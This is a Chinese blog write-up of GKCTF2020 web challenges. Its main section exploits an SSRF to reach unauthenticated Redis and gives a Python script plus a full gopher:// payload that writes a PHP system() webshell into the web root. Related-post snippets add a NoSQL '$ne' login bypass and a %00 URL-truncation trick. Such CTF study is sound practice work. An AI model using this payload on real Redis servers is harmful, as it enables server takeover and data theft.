GKCTF复现-web

最新推荐文章于 2022-03-04 10:20:46 发布
最新推荐文章于 2022-03-04 10:20:46 发布
阅读量522 收藏
点赞数
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/106402584
版权

文章目录

[GKCTF2020]老八小超市儿(shopxo后台全版本拿shell)

渗透测试|shopxo后台全版本获取shell复现

跟着这篇文章一步步做就能拿到flag

[GKCTF2020]EZ三剑客-EzWeb(redis未授权访问)

一,信息收集

题目源码提示了?secret,访问得到了靶机的ip地址,可以考虑进行内网探测。

在这里插入图片描述

二,bp扫C段:

在这里插入图片描述

三,扫端口

然后扫描端口

在这里插入图片描述
扫描到6379端口,6379为redis默认端口,然后看了看wp,才知道是redis的未授权访问漏洞,参考浅析Redis中SSRF的利用

四,利用脚本生成payload

直接用文章中的exp

改为了python3:

import urllib
import requests

protocol="gopher://"
ip = "192.168.163.128"
port = "6379"
shell = "\n\n<?php system(\"cat /flag\") ?>\n\n"
filename = "pass.php"
path = "/var/www/html"
passwd = ""
payload = ''
cmd = ["flushall",
       "set 1 {}".format(shell.replace(" ", "${IFS}")),
       "config set dir {}".format(path),
       "config set dbfilename {}".format(filename),
       "save"
       ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
    payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
    CRLF = "\r\n"
    redis = arr.split()
    cmd = ""
    cmd+="*"+str(len(redis))
    for x in redis:
        cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
    cmd+=CRLF
    return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
    print(payload)

使用得到的payload:

gopher://173.0.41.11:6379/%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2428%0D%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%20%3F%3E%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%248%0D%0Apass.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

在这里插入图片描述
然后访问生成的pass.php得到flag。

173.0.41.11/pass.php

在这里插入图片描述

天问_Herbert555
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GKCTF2020.zip
07-20
GKCTF2020 逆向 pwn等赛题,除web题外均有
GKCTF web
DonkeyMoon的博客
05-26 575
不打比赛,永远不知道自己有多菜,这次跟往常一样,还是自闭,虽然听他们说,这次的题目算是比较简单的,对我来说,都一样,因为没有任何参与感,一点点复现积累吧。 这次题简单做出来了一道密码,一道misc,都是贼简单的。。。。。。做不出来真的是巨难受。 ...
[GKCTF2020]EZ三剑客-EzWeb
feng的博客
12-06 365
知识点 SSRF WP 一道SSRF,但是自己对于SSRF还停留在CTFHub的技能树那样题目告诉你打什么,自己才知道打什么的层度。真正的让自己去探索还是不太会。正好利用这个题目对于SSRF的大致过程有了一定的学习。 首先进入环境,看到输入框url的第一反应就是SSRF。再通过f12看一下源码,发现有?secret,输入后发现: eth0 Link encap:Ethernet HWaddr 02:42:0a:53:f4:09 inet addr:10.83.244.9 Bcast:10
GKCTF(MISC&CRYPTO部分)(完待续。。)
Amherstieae的博客
05-25 1687
写在前面: 嘎嘎,又是被比赛虐的一天(连续虐了三天呜呜呜,安恒月赛等等在写嘎嘎) 部分wp,剩下的一题目前还不会,这次可能会标完待续嘎嘎 crypto 0x01小学生的密码学 嘎,看到题目描述 e(x)=11x+6(mod26) 密文:welcylk (flag为base64形式) 果然是我们小学二年级就能一眼看出的仿射密码呢(才不是嘞,要不是我之前见过,我可能就在这题挂掉了) 话不多说,直接上脚本(小声bb:我感jio看看加密原理可以手撕~) def affine(a,b):
论文复现-深度补全算法
03-10
1、传统深度不全算法复现 2、详细内容可见:https://blog.csdn.net/qq_43627520/article/details/123344654?spm=1001.2014.3001.5502 3、复现代码可直接运行、包含有测试用例、以及验证代码
meshCNN分割准确率复现 - 使用官方代码
08-27
使用MeshCNN官方代码复现了其分割准确率,除了在chairs上的分割准确率偏低,其余均与论文一致 (相差不大,有高有低,大致相同)。 checkpoints文件包含: 1. 四个分割数据集的准确率testacc_log.txt以及最终生成的...
skip-gram 代码复现-简易数据集
12-15
标题 "skip-gram 代码复现-简易数据集" 指的是在自然语言处理领域中,使用skip-gram模型进行训练的一种实践项目。skip-gram是一种流行的语言模型,尤其在Word2Vec算法中被广泛使用,它通过预测一个词在上下文中的...
mall-app-web是一个电商系统的移动端项目,基于uni-app实现。
03-08
mall-app-web是一个电商系统的移动端项目,基于uni-app实现。主要包括首页门户、商品推荐、商品搜索、商品展示、购物车、订单流程、会员中心、客户服务、帮助中心等功能。.zip 适合学习/练手、毕业设计、课程设计、...
论文复现-基于随机蕨的快速相位差DOA估计
最新发布
06-27
@@@包含原文、译文、MATLAB复现代码 =========================================================== 摘要  信号的到达方向(DOA)信息在通信、定位、目标跟踪等方面具有重要意义。基于频域的时延估计能够在子样本精度...
GKCTF wp
灰太的表格的博客
06-27 316
MISC签到 给了个pcapng文件,用winshark分析下,是个webshell后门的交互流量。过滤下http: 随便打开一个数据包,看命令回显,是字符反转加上base64加密的。 找到执行cat /fl4g | base64 命令的回显数据包。 直接查看会显示truncated,直接跟踪下http流: 转下字符串b64解下码再反转下,再解下b64 解出来是这个字符串: 把两个括号删除,把双写变成单写flag就出来了。 web1 easycms 打开页面是一个登录页面,给的hint密码是五位爆破下
GKCTF2020部分web
0xdawn的博客
05-28 1004
[GKCTF2020]CheckIN <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo']; $this-&
GKCTF部分题解
weixin_44377940的博客
05-27 1297
题解目录webChickIN老八小超市儿CVE版签到EZ三剑客-EZwebMISCPokémoncode obfuscation web ChickIN 代码审计 <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $t
GKCTF 2020 re
qq_37439229的博客
05-25 527
周末打了两场比赛 bjd GK,bjd我打自闭了,赛中只做出了两道题,赛后又才又做出一道。。。不得不说按道理我四道题都看懂了,知道方法怎么做,可是我不会写脚本啊。。。得加强python的编程能力了。。。 来说说GKCTF,(虽然还是只做出了3道题。。。。啥时能做到ak啊!!!!) checkin 密码HelloWorld,之后砖块游戏好了 Chelly’s identity 老二次元了。。。。 方法:动态调试,比较简单 a = [0x2,0x3,0x5,0x7,0xb,0xd,0x11,0x13
GKCTF2020web
conelly的博客
03-26 313
[GKCTF2020]cve版签到 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。如果URL包含零(\ 0)字符,则 URL将被静默地截断。 这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 先访问本地主机,用%00截断 /?url=http://127.0.0.1%00www.ctfhub.com 提示要以123结尾 /?url=h
gkctf2021hackme
weixin_44805159的博客
10-10 518
title: gkctf2021hackme typora-copy-images-to: gkctf2021hackme date: 2021-10-10 00:02:59 tags: [渗透测试, ctf, weblogic, 内网穿透] 进入题目,出现的是一个登录框:查看源码后提 示:怀疑是Nosql注入,尝试登录,查看数据包是json传输:burp抓包,构造永真式登录: {"username":{"$ne":1},"password": {"$ne":1}} 发现被检测了,根据提示一:使用uni.
GKCTF2020 checkin
qq_53755216的博客
06-23 315
写在前面 最近快期末考了 拼搏20天 我要上大二 每天晚上会找时间刷一下CTF 正片开始 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $thi
CTF——MISC习题讲解(GKCTF 2021系列)
tlovejr的博客
03-04 5854
CTF——MISC习题讲解(GKCTF 2021系列) 前言 接下来陆续给大家复现一些赛事的杂项习题讲解,因为本人也是小白入门,有些题目做的不对还请各位大佬多多包涵。 一、[GKCTF 2021]签到 链接:https://pan.baidu.com/s/1rlBOLJMn-nYCsuyCT3eOSg?pwd=lfuj 提取码:lfuj 打开题目后是一个流量分析题目 然后我们看一下http协议,并追踪TCP流可以发现,在众多HTTP协议中,好像是执行Linux系统命令。 在这里进行了ls查看 在这里进行了
GKCTF2021部分wp
re1wn
07-02 2042
GKCTF2021 部分wp
算法复现-串的模式匹配
11-12
以下是BF算法的Python实现,用于在主串中查找与模式串相匹配的子串,并返回匹配成功的子串在主串中的起始位置。BF算法的时间复杂度为O(n*m),其中n为主串长度,m为模式串长度。 ```python def BF_match(s, p): ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值